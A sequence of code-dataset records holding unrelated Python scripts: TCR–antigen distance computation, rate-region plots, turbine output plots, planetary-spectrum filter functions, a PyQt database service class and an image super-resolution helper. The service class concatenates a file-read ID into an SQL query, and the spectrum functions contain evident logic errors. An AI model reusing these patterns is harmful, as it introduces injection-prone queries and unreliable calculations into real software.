pdb_group.iloc[0]\n\n # Get and check antigen residues\n antigen_chain_id = pdb_annot['chain_antigen']\n antigen_chain = model[antigen_chain_id]\n antigen_seq = pdb_annot['antigen_seq']\n antigen_range = range(len(antigen_seq))\n\n if use_pdbfixer:\n antigen_residues = get_residues_pdbfixer(antigen_chain, antigen_range,\n model_original[antigen_chain_id])\n else:\n antigen_residues = get_residues(antigen_chain, antigen_range)\n\n antigen_seq_obs = get_seq(antigen_residues)\n\n if antigen_seq != antigen_seq_obs:\n warning(pdb_id, \"Antigen sequence mismatch (expected observed):\", antigen_seq,\n antigen_seq_obs, \". Replacing with one from PDB.\")\n pdb_annot['antigen_seq'] = antigen_seq_obs\n\n mhc_type = pdb_annot['mhc_type']\n\n # Iterate by TCR chain/region (CDR1,2,3 )\n byregion = pdb_group.groupby(['chain_tcr', 'tcr_region'])\n results_by_pdb = []\n for tcr_region_id, tcr_region_group in byregion:\n # Get and check tcr region residues\n tcr_annot = tcr_region_group.iloc[0]\n tcr_region_name = tcr_annot['tcr_region']\n\n if tcr_region_name.startswith(\"FR\"):\n continue\n\n tcr_v_name = tcr_annot['tcr_v_allele']\n tcr_gene = tcr_v_name[0:3]\n tcr_chain_id = tcr_annot['chain_tcr']\n tcr_chain = model[tcr_chain_id]\n tcr_region_seq = tcr_annot['tcr_region_seq']\n tcr_region_range = range(tcr_annot['tcr_region_start'],\n tcr_annot['tcr_region_end'])\n\n if use_pdbfixer:\n tcr_region_residues = get_residues_pdbfixer(tcr_chain, tcr_region_range,\n model_original[tcr_chain_id])\n else:\n tcr_region_residues = get_residues(tcr_chain, tcr_region_range)\n\n tcr_region_seq_obs = get_seq(tcr_region_residues)\n\n if tcr_region_seq != tcr_region_seq_obs:\n warning(pdb_id, \"TCR:\", tcr_region_id, \" sequence mismatch (expected observed): \",\n tcr_region_seq, tcr_region_seq_obs,\n \". Replacing with one from PDB.\")\n tcr_annot['tcr_region_seq'] = tcr_region_seq_obs\n\n # we'll need this for mock complexes\n if generate_mock: #and tcr_region_name == \"CDR3\":\n df_residues.append({'pdb_id': pdb_id,\n 'mhc_type': mhc_type,\n 'ag_seq': antigen_seq_obs,\n 'tcr_seq': tcr_region_seq_obs,\n 'ag_residues': antigen_residues,\n 'tcr_gene': tcr_gene,\n 'tcr_region': tcr_region_name,\n 'tcr_residues': tcr_region_residues})\n\n # Compute distances and add them to results\n\n print(pdb_id, \"- computing distances for\", tcr_v_name,\n ':', tcr_region_id[1])\n\n distances = calc_distances(tcr_region_residues, antigen_residues)\n\n # Append annotation\n for row in distances:\n row.update(tcr_annot.to_dict())\n row.update({'tcr_gene': tcr_gene,\n 'tcr_v_allele': tcr_v_name,\n 'tcr_region': tcr_region_name})\n\n results_by_pdb.extend(distances)\n\n i += 1\n\n # Write selected columns\n res = pd.DataFrame(results_by_pdb)[col_names]\n res.to_csv(output_file, sep='\\t', header=False, index=False, mode='a')\n print(\"Done\")\n\nprint(\"Finished processing\", table.shape[0], \"entries.\")\n\nif generate_mock:\n print(\"Generating mock complexes.\")\n\n col_names_mock = ['mhc_type', 'tcr_gene', 'tcr_region',\n 'pdb_id_a', 'pdb_id_t',\n 'ag_seq_a', 'ag_seq_t',\n 'tcr_seq_a', 'tcr_seq_t',\n 'aa_tcr', 'aa_antigen',\n 'len_tcr', 'len_antigen',\n 'pos_tcr', 'pos_antigen',\n 'distance', 'distance_CA']\n\n with open(output_file_mock, 'w') as f:\n f.write('\\t'.join(col_names_mock) + '\\n')\n\n results_mock = []\n\n df_residues = pd.DataFrame(df_residues)\n\n # split in two tables\n\n df_res_tcr = df_residues[['pdb_id', 'ag_seq', 'tcr_seq',\n 'tcr_gene', 'tcr_region', 'tcr_residues']]\n\n df_res_tcr.columns = ['pdb_id_t', 'ag_seq_t', 'tcr_seq_t',\n 'tcr_gene', 'tcr_region', 'tcr_residues_t']\n\n df_res_ag = df_residues[['pdb_id', 'mhc_type', 'ag_seq', 'tcr_seq',\n 'ag_residues', 'tcr_gene', 'tcr_region',\n 'tcr_residues']]\n\n df_res_ag.columns = ['pdb_id_a', 'mhc_type', 'ag_seq_a', 'tcr_seq_a',\n 'ag_residues', 'tcr_gene', 'tcr_region',\n 'tcr_residues_a']\n\n # merge (+ cartesian product)\n\n df_res = pd.merge(df_res_tcr, df_res_ag,\n on = ['tcr_gene', 'tcr_region'])\n\n # filter\n\n df_res = df_res[(df_res.pdb_id_t != df_res.pdb_id_a) &\n (df_res.ag_seq_t != df_res.ag_seq_a) &\n (df_res.tcr_seq_t != df_res.tcr_seq_a)]\n\n # compute distances for all pairs\n\n for index, row in df_res.iterrows():\n if index % 100 == 0:\n print(\"[\", time.strftime(\"%c\"), index, \"/\", df_res.shape[0], \"]\",\n \"Processing mock entry\", row['pdb_id_a'], row['pdb_id_t'],\n row['ag_seq_a'], row['tcr_seq_t'])\n\n # transfer CDRs to expected position in original pMHC\n tcr_residues_new = superimpose(row['tcr_residues_a'],\n row['tcr_residues_t'],\n row['tcr_region'])\n\n distances = calc_distances(tcr_residues_new, row['ag_residues'])\n\n for row2 in distances:\n row2.update(row.to_dict())\n\n res = pd.DataFrame(distances)[col_names_mock]\n res.to_csv(output_file_mock, sep='\\t', header=False, index=False, mode='a')\n\n print(\"Finished processing\", df_res.shape[0], \"mock entries.\")\n","sub_path":"preprocessing/structure/src/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":9152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18239329","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass RateRegion():\n def __init__(self, MI0, MI1, MI0_1, MI1_0, MI_sum):\n self.MI0 = MI0\n self.MI1 = MI1\n self.MI0_1 = MI0_1\n self.MI1_0 = MI1_0\n self.MI_sum = MI_sum\n\n def print(self):\n print('MI0 = {:.3f}'.format(self.MI0))\n print('MI1 = {:.3f}'.format(self.MI1))\n print('MI0_1 = {:.3f}'.format(self.MI0_1))\n print('MI1_0 = {:.3f}'.format(self.MI1_0))\n print('MI_sum = {:.3f}'.format(self.MI_sum))\n\n def plot(self, ax):\n ax.plot([0, self.MI0], [self.MI1_0]*2,'b-')\n ax.plot([self.MI0, self.MI0_1], [self.MI1_0,self.MI1], 'b-')\n ax.plot([self.MI0_1]*2, [self.MI1, 0], 'b-')\n R_min = np.min([self.MI0_1, self.MI1_0])\n ax.plot([0,R_min], [0,R_min], 'r--')\n ax.plot([0,self.MI0_1], [self.MI1]*2, '--', color='grey')\n ax.plot([self.MI0]*2, [0,self.MI1_0], '--', color='grey')\n\n def get(self):\n return self.MI0, self.MI1, self.MI0_1, self.MI1_0, self.MI_sum\n\n @staticmethod\n def average(rr1, rr2):\n MI0 = (rr1.MI0+rr2.MI0)/2\n MI1 = (rr1.MI1+rr2.MI1)/2\n MI0_1 = (rr1.MI0_1+rr2.MI0_1)/2\n MI1_0 = (rr1.MI1_0+rr2.MI1_0)/2\n MI_sum = (rr1.MI_sum+rr2.MI_sum)/2\n return RateRegion(MI0, MI1, MI0_1, MI1_0, MI_sum)\n\n\ndef plot_rate_region(C, I, N):\n plt.plot([0,np.log2(1+C/(I+N))],[np.log2(1+I/N)]*2,'b-')\n plt.plot([np.log2(1+C/(I+N)), np.log2(1+C/N)], [np.log2(1+I/N), np.log2(1+I/(C+N))], 'b-')\n plt.plot([np.log2(1+C/N)]*2, [np.log2(1+I/(C+N)),0], 'b-')\n R_min = np.min([np.log2(1+C/N), np.log2(1+I/N)])\n plt.plot([0,R_min],[0,R_min],'r--')\n plt.title('C={:.2g}, I={:.2g}, N={:.2g}'.format(C,I,N))\n plt.grid()\n plt.show()\n","sub_path":"sigcom/it/rate_region.py","file_name":"rate_region.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"92365779","text":"\"\"\"\nPlot comparison of turbine models\n\"\"\"\nimport sys\nlibpath = 'C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\dissertation'\nif (libpath not in sys.path): sys.path.append(libpath)\n\nimport JR_Library.main as jr\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\n# specify the directory to write the files to\n#turbs = ['WP1500', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1500_FAST_v7'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5_Linux'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00')]\nturbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_dynin')]\n#turbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP0.75A08V00', os.path.join('\\\\\\\\monsoon-data\\\\Public\\\\JRinker\\\\' + \\\n# 'fast_simulations\\\\FastDir\\\\SmallRun','WP0.75A08V00')]\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_stifftwr'),\\\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_stiffblds')]\n#fileIDs = ['_42331','_42331','_42331','_42331','_42331']\n#fileIDs = ['_91242','_91242','_91242','_91242','_91242']\nfileIDs = ['_00000','_00000','_00000','_00000','_00000']\n#fileIDs = ['_00000','_00001']\n\nt_plot = [30,630]\n\nPlotFields = ['Time','WindVxi','RotSpeed','GenPwr',\n 'BldPitch1','TSR','GenTq','YawBrTAxp','OoPDefl1']\n#leg_str = ['Linux 1.5','Windows 1.5']\n#leg_str = ['Standard pitch','Modified GS']\n#leg_str = ['Standard model','Modified GBR','Stiffened tower',\n# 'Stiffened blades','Extra damp']\nleg_str = ['EQUIL','DYNIN']\n#leg_str = ['Desktop','Monsoon']\nc = ['b','r','g','c','m','y','k']\n\nfig1 = plt.figure(5,figsize=(6.5,10))\nplt.clf()\n\nfor i in range(len(turbs)/2):\n \n TName = turbs[2*i]\n turb_dir = turbs[2*i+1]\n \n fname = os.path.join(turb_dir,TName+fileIDs[i])\n FAST = jr.ReadFASTFile(fname+'.out')\n \n t = FAST['Data'][:,FAST['Fields'].index('Time')]\n \n print(FAST['Data'][:,FAST['Fields'].index('OoPDefl1')].max())\n \n for i_plot in range(len(PlotFields)-1):\n ax = fig1.add_subplot(len(PlotFields)-1,1,i_plot+1)\n \n y = FAST['Data'][:,FAST['Fields'].index(PlotFields[i_plot+1])]\n ax.plot(t,y,c[i],label=leg_str[i])\n ax.set_title(PlotFields[i_plot+1])\n# if i_plot < len(PlotFields)-2:\n# ax.set_ylim([np.mean(y)*0.95,np.mean(y)*1.05])\n if i_plot == 0:\n ax.legend()\n \n ax.set_xlim(t_plot)\n \nplt.tight_layout()","sub_path":"FAST_models/WindPACT/code/plot-turbine_comparison.py","file_name":"plot-turbine_comparison.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"367699528","text":"from __future__ import print_function\nimport math\nimport corner\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport pdb\nimport time\nimport pickle as pc\nfrom difference_metric import *\n\n# Import solar system spectra\n\nsol_data = np.loadtxt('SunKuruczSpectrum.txt')\n\nearth_data = np.loadtxt('earth.txt')\n\njup_data = np.loadtxt('Jupiter_geo_albedo.txt')\n\n#ven_data = np.loadtxt('Venus_geo_albedo.txt') #3d array\n\nmars_data = np.loadtxt('Mars_geo_albedo.txt')\n\nnep_data = np.loadtxt('Neptune_geo_albedo.txt')\n\nsat_data = np.loadtxt('planets_2/Saturn_geo_albedo.txt')\n\nven_data = np.loadtxt('planets_2/Venus_geo_albedo.txt', skiprows=9)\n\n# Early solar\narchearth_data = np.loadtxt('planets_2/ArcheanEarth_geo_albedo.txt')\n\n# Get specific x (wavelengths in microns) and y (spectral flux density or albedo)\nx_sol = sol_data[:,0]\nx_ear = earth_data[:,0]\nx_jup = jup_data[:,0]\nx_mars = mars_data[:,0]\nx_nep = nep_data[:,0]\nx_sat = sat_data[:,0]\nx_ven = ven_data[:,0]\nx_archearth = archearth_data[:,0]\n\ny_sol = sol_data[:,1]\ny_ear = earth_data[:,2]\ny_jup = jup_data[:,1]\ny_mars = mars_data[:,1]\ny_nep = nep_data[:,1]\ny_sat = sat_data[:,1]\ny_ven = ven_data[:,1]\ny_archearth = archearth_data[:,1]\n\n### y-column of earth data is albedo- must multiply by solar flux to get reflective flux (which requires us to interpolate the solar spectrum to the earth's wavelength grid)\n\ny_sol_interp_ear = np.interp(x_ear,x_sol,y_sol) #solar flux values interpolated to earth's grid\n\nflux_earth = y_sol_interp_ear * y_ear #interpolated solar flux values * earth's alebdo\n\ny_sol_interp_jup = np.interp(x_jup,x_sol,y_sol) #solar flux values interpolated to jupiters's grid\n\nflux_jup = y_sol_interp_jup *y_jup #interpolated solar flux values * jupiters's alebdo\n\n\ny_sol_interp_mars = np.interp(x_mars,x_sol,y_sol) #solar flux values interpolated to mars' grid\n\nflux_mars = y_sol_interp_mars * y_mars #interpolated solar flux values * mars' alebdo\n\ny_sol_interp_nep = np.interp(x_nep,x_sol,y_sol) #solar flux values interpolated to neptune's grid\n\nflux_nep = y_sol_interp_nep * y_nep #interpolated solar flux values * neptune's alebdo\n\ny_sol_interp_sat = np.interp(x_sat,x_sol,y_sol) #solar flux values interpolated to mars' grid\n\nflux_sat = y_sol_interp_sat * y_sat #interpolated solar flux values * mars' alebdo\n\ny_sol_interp_ven = np.interp(x_ven,x_sol,y_sol) #solar flux values interpolated to ventune's grid\n\n#pdb.set_trace()\n\nflux_ven = y_sol_interp_ven * y_ven #interpolated solar flux values * ventune's alebdo\n\ny_sol_interp_archearth = np.interp(x_archearth ,x_sol,y_sol) #solar flux values interpolated to archearth's grid\n\nflux_archearth = y_sol_interp_archearth * y_archearth #interpolated solar flux values * archearth's alebdo\n\n# Not main 4 spectra\nwl = np.loadtxt('planets_2/wavelengths.txt')\n\n# Save to easy to remember variables\n#earth = np.array([flux_earth,y_ear])\n#jup = np.array([flux_jup,y_jup])\n#mars = np.array([flux_mars,y_mars])\n#nep = np.array([flux_nep,y_nep])\n\nearth = [x_ear, flux_earth]\njup = [x_jup, flux_jup]\nmars = [x_mars, flux_mars]\nnep = [x_nep, flux_nep]\nsat = [x_sat, flux_sat]\nven = [x_ven, flux_ven]\narchearth = [x_archearth, flux_archearth]\n\nplanet_dict = {\n 'earth': earth,\n 'jupiter': jup,\n 'mars': mars,\n 'neptune': nep,\n 'saturn': sat,\n 'venus': ven,\n 'archearth': archearth,\n }\n\n# Automated importing beyond this point\nwith open(\"import_spectra.txt\",\"r\") as infile:\n lines = infile.readlines()\n\nfor line in lines:\n items = line.split()\n filename = items[0]\n if len(items) > 1:\n keyname = items[1]\n else:\n keyname = filename.split('/')[1]\n\n if filename[0] not in ['*','#']:\n print(\"Importing\", filename)\n\n # check to make sure the first line is not a str\n rowSkip = 0\n with open(filename,'r') as infile:\n lines = infile.readlines()\n for line in lines:\n if len(line.strip()) == 0:\n rowSkip += 1\n elif line.strip()[0] not in [str(n) for n in range(10)]:\n rowSkip += 1\n else:\n break\n\n if rowSkip < len(lines):\n data = np.loadtxt(filename, skiprows=rowSkip)\n x = data[:,0]\n y = data[:,1]\n\n y_sol_interp = np.interp(x,x_sol,y_sol)\n\n flux = y_sol_interp * y\n\n planet_dict[keyname] = [x, flux]\n\n else:\n pdb.set_trace()\n print(\"Import failed!\",filename)\n\n\n\n# Plot the spectra\nfor key in planet_dict.keys():\n wl = planet_dict[key][0]\n flux = planet_dict[key][1]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(wl, flux, ls = '-', marker = '')\n ax.set_xlabel(\"Wavelength (microns)\")\n ax.set_ylabel(\"Flux\")\n ax.set_title(str(key) + \" spectrum\")\n plt.savefig(str(key) + \"_spectrum.pdf\")\n\n#Convert solar jansky as a function of frequency to wavelength\nc = 3e10 #cm/s\nh = 6.626e-27\nep = h*c/x_sol #energy per photon\ny_sol = sol_data[:,1]*10e-23 #convert jansky into cgs unit (ergs/s/cm^2/hz)\ny_sol = y_sol*(c/x_sol**2) #convert Jansky to spectral irradiance in terms of wavelength\n\n#DEFINE FILTER VARIABLES\nlambda_min = 0.3 # blue edge in microns\nlambda_max = 2.4 # red edge in microns\nminimum_bin = .1 #minimum bin size in microns\nbin_sep = .1\nnumber_of_bins = 3\n\n\nmin_lambda=0.2\nf1_f = 0.4\nf2_i = 0.4\nf2_f = 0.85\nf3_i = 1.8\nmax_lambda= 1.8\n\nranges = [min_lambda, f1_f, f2_i, f2_f, f3_i, max_lambda]\n\n# Defining a function to calculate the differences between spectra in a given\n# wavelength band\ndef dwl(x, spectra1, spectra2):\n '''\n Calculates the difference between two spectra within given wavelength regions\n\n Note that this will always return a positive value.\n\n Make sure the input spectra have the same wavelength values, interpolate if\n necessary\n\n The input spectra should have the form [wl,flux]\n\n Inputs:\n - x: bin definitions (ndarray)\n - spectra1: the first spectra (ndarray)\n - spectra2: the second spectra (ndarray)\n\n Outputs:\n - diffsum: the sum of differences in the given wavelength region\n (positive float)\n '''\n diffsum = 0\n for i in range(len(x)):\n if i % 2 == 0:\n if i >= len(x)-1:\n break\n\n wlrange = (x[i],x[i+1])\n\n # Trim the spectra\n mask1 = (spectra1[0] > x[i]) & (spectra1[0] < x[i+1])\n spectra1_trimmed = [spectra1[0][mask1],spectra1[1][mask1]]\n\n mask2 = (spectra2[0] > x[i]) & (spectra2[0] < x[i+1])\n spectra2_trimmed = [spectra2[0][mask2],spectra2[1][mask2]]\n\n # Compare along these lines\n # Integrate both ranges\n SPEC1 = np.trapz(spectra1[1], spectra1[0])\n SPEC2 = np.trapz(spectra2[1], spectra2[0])\n diffsum += SPEC1 + SPEC2\n\n return diffsum\n\ndef modify_x(in_x, modifier = 0, simple=False):\n '''\n Puts a vector x into the proper form we need for analysis\n '''\n x = in_x.copy()\n\n if simple == False:\n for i in range(len(x)):\n if i+1 < len(x):\n x[i] = (x[i] * (ranges[i+1] - ranges[i] + modifier) + ranges[i]\n - modifier)\n else:\n x[i] = (x[i] * (ranges[i] - ranges[i-1] + modifier)\n + ranges[i-1] - modifier)\n\n elif simple == \"decent\":\n for i in range(len(x)):\n if i == 0:\n x[i] = (x[i] + 1) * ranges[i]\n\n else:\n x[i] = (1+x[i]) * x[i-1]\n\n elif simple == \"bands\":\n for i in range(len(x)):\n if i % 2 == 0:\n x[i] = x[i] * (ranges[i+1] - ranges[i]) + ranges[i]\n x[i+1] = x[i+1] * (ranges[i+1] - ranges[i]) * .15 + x[i]\n else:\n for i in range(len(x)):\n x[i] = x[i] * (ranges[-1] - ranges[0]) + ranges[0]\n\n # Force all max bin to be the maximum\n if x[-1] > max_lambda:\n x[-1] = max_lambda\n\n return x\n\n## Probability density function\n#def lnprob(x, spectra1, spectra2, modifier, verbose = False, use_fun = False):\n# '''\n# Probability density function used to calculate each walker's (`x`) likelihood.\n#\n# Inputs:\n# - x: a single vector of parameters used for a given result.\n# - spectra1: first input spectra\n# - spectra2: second input spectra\n# - modifier: a modifier that changes minimum distance between the bins\n# - verbose: returns information about why something returns -np.inf\n# '''\n# # Log difference\n# #for el in x:\n# # if el > 1:\n# # raise ValueError('x is somehow greater than 1 with value ' + str(x))\n# nx = modify_x(x, modifier, simple=\"bands\")\n# if not use_fun:\n# diff = dwl(nx,spectra1,spectra2)\n# else:\n# diff = fun(nx,spectra1,spectra2)\n#\n# # Check to make sure all conditions are met\n# # All greater than the minimum wavelength\n# if True in [xi < min_lambda for xi in nx]:\n# #print('LNPROB -inf, less than MIN')\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"LESS THAN MIN\"\n#\n# # All less than maximum wavelength\n# if True in [xi > max_lambda for xi in nx]:\n# #print('LNPROB -inf, greater than MAX: ' + str(nx[-1]))\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"GREATER THAN MAX\"\n#\n# # All positive values for the scalars\n# if True in [xi < 0 for xi in x]:\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"NEGATIVE SCALAR\"\n#\n# for i in range(len(nx)):\n# if i > 0:\n# # Sequential increase\n# #if nx[i] < nx[i-1]:\n# # #print('LNPROB -inf,',nx[i],'>',nx[i+1])\n# # if not verbose:\n# # return -np.inf\n# # else:\n# # return -np.inf, \"NOT IN ASCENDING ORDER\"\n#\n# # Bins are sufficiently separated \n# if i % 2 == 0:\n# if np.absolute(nx[i] - nx[i-1]) < bin_sep:\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS NOT SUFFICIENTLY SEPARATED\"\n#\n# elif i+1 != len(nx):\n# # Minimum bin size\n# if np.absolute(nx[i] - nx[i+1]) < minimum_bin:\n# #print('LNPROB -inf, bin too small')\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS ARE TOO SMALL\"\n#\n# if np.absolute(nx[i] - nx[i-1]) > .15*(ranges[i] - ranges[i-1]):\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS TOO LARGE\"\n#\n#\n# # Return lnprob\n# #print(np.log(diff))\n# #pdb.set_trace()\n# if not verbose and diff != np.nan and not math.isnan(diff):\n# return np.log(diff)\n# elif diff == np.nan or math.isnan(diff):\n# if verbose:\n# return -np.inf, \"NAN\"\n# else:\n# return -np.inf\n# else:\n# if diff < 0:\n# return -np.inf\n# return np.log(diff), \"ALL GOOD\"\n\n#OBJECTIVE FUNCTION fun\ndef fun(x, spectra1, spectra2):\n\n #Planets = [earth_data, jup_data, mars_data, nep_data]\n\n ## these are the start and endpoints of three bins:\n a1=x[0]\n b1=x[1]\n a2=x[2]\n b2=x[3]\n a3=x[4]\n b3=x[5]\n\n bins=[[a1,b1],[a2,b2],[a3,b3]]\n\n #~~~ EARTH ~~~#\n\n x_ear = spectra1[0]\n flux_earth = spectra1[1]\n\n #Filter 1\n #np.where returns elements, either x or y, depending on condition\n #find index of elements where (from a to b)\n xindex1 = np.where(np.logical_and(x_ear >= x[0], x_ear <= x[1]))\n\n #make an earth x array that corresponds to x index (wavelength)\n earth_xarray1 = x_ear[xindex1]\n #print earth_xarray1\n #find y values corresponding to x range (flux)\n earth_yarray1 = flux_earth[xindex1]\n #print ('ha')\n #print flux_earth[xindex1], xindex1\n\n #integrate values in yarray to give total flux for wavelength range\n flux_earth1 = np.trapz(earth_yarray1,x=earth_xarray1)\n #print flux_earth1\n\n #Filter 2\n xindex2 = np.where(np.logical_and(x_ear >= x[2], x_ear <= x[3]))\n\n earth_xarray2 = x_ear[xindex2]\n\n earth_yarray2 = flux_earth[xindex2]\n\n flux_earth2 = np.trapz(earth_yarray2,x=earth_xarray2)\n\n #Filter 3\n xindex3 = np.where(np.logical_and(x_ear >= x[4], x_ear <= x[5]))\n\n earth_xarray3 = x_ear[xindex3]\n\n earth_yarray3 = flux_earth[xindex3]\n\n flux_earth3 = np.trapz(earth_yarray3,x=earth_xarray3)\n flux_earth3\n\n #~~~ PLANET 2 ~~~#\n\n\n x_p = spectra2[0]\n flux_p = spectra2[1]\n\n #Filter 1\n #np.where returns elements, either x or y, depending on condition\n #find index of elements where (from a to b)\n xindex4 = np.where(np.logical_and(x_p >= x[0], x_p <= x[1]))\n \n #make an earth x array that corresponds to x index (wavelength)\n p_xarray1 = x_p[xindex4]\n \n #find y values corresponding to x range (flux)\n p_yarray1 = flux_p[xindex4]\n \n #integrate values in yarray to give total flux for wavelength range\n flux_p1 = np.trapz(p_yarray1,x=p_xarray1)\n \n #Filter 2\n xindex5 = np.where(np.logical_and(x_p >= x[2], x_p <= x[3]))\n \n p_xarray2 = x_p[xindex5]\n \n p_yarray2 = flux_p[xindex5]\n \n flux_p2 = np.trapz(p_yarray2,x=p_xarray2)\n \n #Filter 3\n xindex6 = np.where(np.logical_and(x_jup >= x[4], x_jup <= x[5]))\n \n p_xarray3 = x_p[xindex6]\n \n p_yarray3 = flux_p[xindex6]\n \n flux_p3 = np.trapz(p_yarray3,x=p_xarray3)\n\n max = np.sqrt(((flux_earth1/flux_earth2) - (flux_p1/flux_p2))**2 +\n ((flux_earth3/flux_earth2) - (flux_p3/flux_p2))**2)\n #print earth_xarray2\n \"\"\"print ('haha')\n print flux_earth1\n print flux_earth2\n print flux_earth3\n print flux_jup1\n print flux_jup2\n print flux_jup3\n print ('hahaha')\"\"\"\n #print max\n return max\n","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":14196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"313810639","text":"import sys, os\n\nfrom PyQt5.QtCore import QObject, pyqtSignal as Signal, pyqtSlot as Slot\n\nfrom classes import database\n\nclass service(QObject):\n def __init__(self):\n QObject.__init__(self)\n self.fromDB = database.database()\n self.sqlString = None\n self.sqlData = None\n self.sqlList = None\n self.idText = None\n \n @Slot()\n def getCurrentAccount(self):\n txtLocationAndName = os.path.join(\n os.getcwd(), \n r\"texts/fileDirectoryText.txt\"\n )\n\n txtFile = open(\n txtLocationAndName, \n \"r\"\n )\n\n for x in txtFile:\n self.idText = x.split(',')[0]\n txtFile.close()\n \n displaySignal = Signal(str, str)\n displaySignal2 = Signal(int, int)\n @Slot()\n def display(self):\n self.sqlString = \"SELECT id, servicetitle, servicemessage FROM serviceoffered WHERE instructor = \" + self.idText + \" AND accepted = '0' ORDER BY id DESC\"\n self.sqlList = self.fromDB.selectall(self.sqlString)\n count = 0\n for x in self.sqlList:\n self.displaySignal.emit(x[1], x[2])\n self.displaySignal2.emit(count, x[0])\n count += 1\n\n @Slot(str, str)\n def addService(self, title, message):\n title = title.title()\n self.sqlString = \"INSERT INTO serviceoffered (instructor, servicetitle, servicemessage) VALUES (%s, %s, %s)\"\n self.sqlData = (self.idText, title, message)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n \n @Slot(int, str, str)\n def editService(self, id, title, message):\n title = title.title()\n self.sqlString = \"UPDATE serviceoffered SET servicetitle = %s, servicemessage = %s WHERE id = %s\"\n self.sqlData = (title, message, id)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n @Slot(int)\n def removeService(self, id):\n self.sqlString = \"DELETE FROM serviceoffered WHERE id = %s\"\n self.sqlData = (id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)","sub_path":"classes/adminFunctions/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"646975796","text":"import os\nimport time\nfrom PIL import Image\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom flask import current_app\n\n\ndef enhance_image(low_res_img):\n try:\n hr_image = preprocess_image(low_res_img)\n model = hub.load(\"https://tfhub.dev/captain-pool/esrgan-tf2/1\")\n start = time.time()\n fake_image = model(hr_image)\n fake_image = tf.squeeze(fake_image)\n print(\"Time Taken: %f\" % (time.time() - start))\n save_image(fake_image, current_app.config[\"SUPER_RES_COMPUTED_IMG\"])\n return True\n except Exception as e:\n raise e\n\n\ndef preprocess_image(image_path):\n hr_image = tf.image.decode_image(tf.io.read_file(image_path))\n if hr_image.shape[-1] == 4:\n hr_image = hr_image[...,:-1]\n hr_size = (tf.convert_to_tensor(hr_image.shape[:-1]) // 4) * 4\n hr_image = tf.image.crop_to_bounding_box(hr_image, 0, 0, hr_size[0], hr_size[1])\n hr_image = tf.cast(hr_image, tf.float32)\n return tf.expand_dims(hr_image, 0)\n\n\ndef save_image(image, filename):\n if not isinstance(image, Image.Image):\n image = tf.clip_by_value(image, 0, 255)\n image = Image.fromarray(tf.cast(image, tf.uint8).numpy())\n image.save(\"%s\" % filename)\n print(\"Saved as %s\" % 